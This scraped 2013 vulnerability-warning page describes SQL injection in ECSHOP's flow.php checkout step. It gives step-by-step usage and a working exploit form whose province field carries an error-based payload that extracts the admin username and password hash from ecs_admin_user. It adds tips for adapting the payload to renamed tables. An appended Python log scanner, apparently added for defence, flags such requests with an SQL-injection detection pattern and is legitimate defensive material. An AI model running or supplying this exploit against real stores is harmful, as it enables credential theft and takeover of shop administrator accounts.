ECSHOP flow page injection: usage method & EXP - Vulnerability Warning - Black Bar Safety Net

2013-05-22T00:00:00
ID MYHACK58:62201338889
Type myhack58
Reporter Anonymous
Modified 2013-05-22T00:00:00

Description

Usage: first register an account. Add any item to the shopping cart. The page where you fill in your delivery address has a region selector; pick a region, then copy that page's address into the EXP.

EXP:

<form name="form1" method="post">

ECSHOP-pass version of injection vulnerabilities a simple EXP [ Silic Group Hacker Army ]<input name="country" type="text" style="display:none" value="1"/><br />

<textarea rows="5" style="font-family:Times New Roman;font-size:14pt;" cols="8 0" name="province">1 1'and(select 1 from(select count(),concat(floor(rand(0)2),0x3a,(select(select(SELECT concat(user_name,0x3a,password)FROM ecs_admin_user limit 0,1))from information_schema. tables limit 0,1))x from information_schema. tables group by x)a) and 1=1#</textarea>

<input name="district" type="text" style="display:none" value="1 2 9 4"/>

<input name="consignee" type="text" style="display:none" value="1 1 1 1 1 1 1"/>

<input name="email" type="text" style="display:none" value="root@WebShell.cc"/>

<input name="address" type="text" style="display:none" value="1 1 1 1 1 1"/>

<input name="tel" type="text" style="display:none" value="1 1 1 1 1 1 1"/>

<input name="step" type="text" style="display:none" value="consignee"/>

<input name="act" type="text" style="display:none" value="checkout"/><br /><br />

Address:<input name="theAction" type="text" id="theAction" value="http://xxx.com/flow.php?step=consignee" size="5 0"><br /><br />

<input type="submit" value="delivery to this address" onClick="this. form. action=this. form. theAction. value;" name="Submit"><br/><br />

// WebShell's Blog URL: Www.WebShell.CC

</form>

Addendum: if it does not succeed, pay attention to the error statement, for example: MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT region_id, region_name FROM asky880.17_region WHERE r. This site changed the database's default names, so the EXP has to be modified accordingly: ecs_admin_user becomes 17_admin_user.
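
A defensive check for the request the EXP above sends, as an added example that is not part of the original page or ECSHOP's own code: it flags POSTs to flow.php with step=consignee whose country, province or district value is not a plain integer. That these fields are integer region IDs is an assumption drawn from the form's other values and the region_id query in the error message; the function names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Fields the page's form posts as region selections (assumed to be integer IDs).
REGION_FIELDS = ("country", "province", "district")
INTEGER = re.compile(r"[0-9]{1,10}")
# Traits of the payload shown on the page: quote, comment, subquery, schema access.
SQL_MARKERS = re.compile(
    r"'|#|--|\bselect\b|\bconcat\s*\(|information_schema|\bfloor\s*\(\s*rand", re.I)

SAMPLE_REQUESTS = [  # constructed records (method, URL, POST body), not real traffic
    ("POST", "/flow.php?step=consignee", "country=1&province=11&district=1294"),
    ("POST", "/flow.php?step=consignee",
     "country=1&province=11%27and%28select+1%29%23&district=1294"),
    ("POST", "/flow.php?step=consignee", "country=1&province=abc&district=1294"),
    ("GET", "/flow.php?step=cart", ""),
]


def is_consignee_post(method, url, form):
    """True for a POST to flow.php whose step (URL or body) is 'consignee'."""
    parts = urlsplit(url)
    steps = parse_qs(parts.query).get("step", []) + form.get("step", [])
    return (method.upper() == "POST" and parts.path.endswith("/flow.php")
            and "consignee" in steps)


def check_request(method, url, body):
    """Return (field, reason) findings for one logged request."""
    form = parse_qs(body, keep_blank_values=True)
    if not is_consignee_post(method, url, form):
        return []
    findings = []
    for field in REGION_FIELDS:
        for value in form.get(field, []):
            value = value.strip()
            if value == "" or INTEGER.fullmatch(value):
                continue  # empty (nothing selected) or a plain integer ID
            reason = "sql-markers" if SQL_MARKERS.search(value) else "non-integer"
            findings.append((field, reason))
    return findings


def scan(requests):
    """Return (index, findings) for every request with at least one finding."""
    return [(i, f) for i, r in enumerate(requests) if (f := check_request(*r))]


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_REQUESTS):
        print(index, findings)
```

The same integer test applied server-side, before the region value reaches the query, is what removes the injection for these fields; the log scan only surfaces attempts.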